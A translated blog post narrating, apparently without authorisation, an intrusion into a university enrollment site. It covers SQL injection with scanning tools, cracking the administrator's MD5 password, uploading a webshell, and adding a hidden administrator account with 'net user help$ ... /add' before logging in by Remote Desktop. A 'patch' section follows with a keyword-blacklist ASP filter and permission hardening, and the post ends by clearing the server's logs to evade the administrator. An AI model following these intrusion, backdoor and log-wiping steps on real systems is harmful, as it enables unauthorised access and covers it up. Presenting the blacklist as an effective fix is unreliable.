Small server intrusion and vulnerability repair

Source: Internet
Author: User

SQL injection attacks
Today I took a look at the enrollment website of a university. When trying to get into a site, the first thing that comes to mind is SQL injection, so we start by probing the target. First, search Baidu for site:xxx.xxxx.net.cn/zs/index.asp to list all of the site's pages, then have a look with the Ah D injection tool.
Nothing turned up.
So let's hand it to JSky. Let it crawl the site's directory structure first to see which pages the site has, then probe the site with JSky's injection-point detection function.

The link that JSky flags after the SQL injection scan is the problematic one, that is, our injection point. We analyse this injection point with Pangolin and obtain the account and password of the site administrator.

The password is stored as an MD5 hash. We can look it up at http://www.20.5.com/default.aspx to recover the administrator password, then obtain a webshell through the upload function.

The above is a webshell.
Upload a privilege-escalation tool and execute the cmd commands:
net user help$ 123456 /add
net localgroup administrators help$ /add
This adds an administrator account for ourselves.

Use Remote Desktop to connect to the server, enter the account and password just created, and log on.


Patch
After logging on to the server, start with the site whose administrator account and password we just obtained through injection: add an anti-injection check to it, that is, add the following code to the database connection file. (Once anti-injection is in place, newbies like us can basically go home ~~)
<%
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
' Keywords and characters to be filtered, separated by the character "防"
Fy_In = "'防;防and防exec防insert防select防delete防update防count防*防chr防mid防master防truncate防char防declare防<防>防=防|防-防_"
Fy_Inf = Split(Fy_In, "防")
' Check every POST (form) parameter against the keyword list
If Request.Form <> "" Then
    For Each Fy_Post In Request.Form
        For Fy_Xh = 0 To UBound(Fy_Inf)
            If InStr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh)) <> 0 Then
                Response.Write "<Script Language=JavaScript>alert('Illegal characters in the request parameters; this site is not that easy to do.');</Script>"
                Response.Write "Illegal operation! Your request looks wrong.<br>"
                Response.End
            End If
        Next
    Next
End If
' Check every GET (query string) parameter the same way
If Request.QueryString <> "" Then
    For Each Fy_Get In Request.QueryString
        For Fy_Xh = 0 To UBound(Fy_Inf)
            If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh)) <> 0 Then
                Response.Write "<Script Language=JavaScript>alert('Illegal characters in the request parameters; this site is not that easy to do.');</Script>"
                Response.Write "Illegal operation! Your request looks wrong.<br>"
                Response.End
            End If
        Next
    Next
End If
%>
Add the above code to the site's database connection file so that it filters illegal request parameters. Note that this is a keyword blacklist applied before the page runs: it also rejects legitimate input that happens to contain one of the listed words or characters, and it does not change the vulnerable queries themselves.
When I test injection on this site again, the following happens. This effectively avoids the damage that injection does to the site.
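To see what the filter above actually accepts and rejects, here is the same keyword blacklist rewritten in Python as an added example (it is not code from the original post). The keyword list is the one from the ASP snippet; the sample requests, the field names and the function names first_hit and check_request are constructed for this example. Running it shows the filter blocking a classic injection string, but also rejecting ordinary names and e-mail addresses, which is the false-positive cost of this approach.

```python
# Added example: Python model of the ASP keyword blacklist above.
# Keyword list copied from the snippet's Fy_In string (separator "防").
FY_IN = ("'防;防and防exec防insert防select防delete防update防count防*防chr"
         "防mid防master防truncate防char防declare防<防>防=防|防-防_")
BLOCKED = FY_IN.split("防")


def first_hit(value: str):
    """Return the first blacklisted keyword contained in value, or None.

    Mirrors InStr(LCase(value), keyword) <> 0: a case-insensitive substring
    test in list order, so "Alexander" is rejected because it contains "and".
    """
    low = value.lower()
    for kw in BLOCKED:
        if kw in low:
            return kw
    return None


def check_request(form: dict, query: dict):
    """Scan every form field, then every query-string field, like the ASP code.

    Returns (where, field, keyword) for the first offending parameter, or
    None when the whole request passes the filter.
    """
    for where, params in (("form", form), ("query", query)):
        for name, value in params.items():
            hit = first_hit(value)
            if hit is not None:
                return (where, name, hit)
    return None


if __name__ == "__main__":
    # Constructed sample requests: one injection attempt, several benign ones.
    samples = [
        ({}, {"id": "1' or 1=1"}),               # injection test vector
        ({"name": "Alexander"}, {}),             # legitimate name
        ({"email": "first-last@example.com"}, {}),  # legitimate e-mail
        ({"q": "Charles"}, {}),                  # legitimate search term
        ({"name": "Bob"}, {"id": "42"}),         # passes the filter
    ]
    for form, query in samples:
        result = check_request(form, query)
        verdict = "blocked on %r" % (result,) if result else "allowed"
        print(f"form={form} query={query}: {verdict}")
```

The output makes the trade-off concrete: the injection string is caught on the very first keyword (the apostrophe), but so are "Alexander" (matches "and"), "first-last@example.com" (matches "-") and "Charles" (matches "char"), while the request with "Bob" and "42" passes.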

Delete the Inetpub directory

Because the Inetpub folder is readable and writable by the network (IIS) accounts, removing it keeps attackers from using that folder.
We can also use a webshell tool to check which directories are readable and writable, and then fix their permissions.

System drive and all other drives: grant Full Control only to the Administrators group and SYSTEM.
System drive, Documents and Settings directory: Full Control only to the Administrators group and SYSTEM.
System drive, Documents and Settings\All Users directory: Full Control only to the Administrators group and SYSTEM.
System drive, Inetpub directory and all directories and files beneath it: Full Control only to the Administrators group and SYSTEM.
System drive, Windows\System32\cacls.exe, net.exe and net1.exe (one further file name is unreadable in the source): Full Control only to the Administrators group and SYSTEM.
Read, modify and execute permissions on files on the system drive: granted only to the Administrators group and SYSTEM.


Disable the FileSystemObject component
In cmd, go to the C:\WINDOWS\system32 directory and run regsvr32 scrrun.dll /u.

Remove xp_cmdshell in SQL Server: open Enterprise Manager → Databases → master → Extended Stored Procedures → xp_cmdshell, right-click and delete it!

However, even after xp_cmdshell is deleted it can be restored with a tool, and I don't know whether there is any way to solve this.
It turned out the server had been intruded before and its Administrator account had been cloned; delete the cloned administrator account.


Download 360 to fix system vulnerabilities on the server.

Clear the system logs on the server (if the administrator catches me, I'll probably have to work hard for the network cause again ~~~).
Just passing through ~~
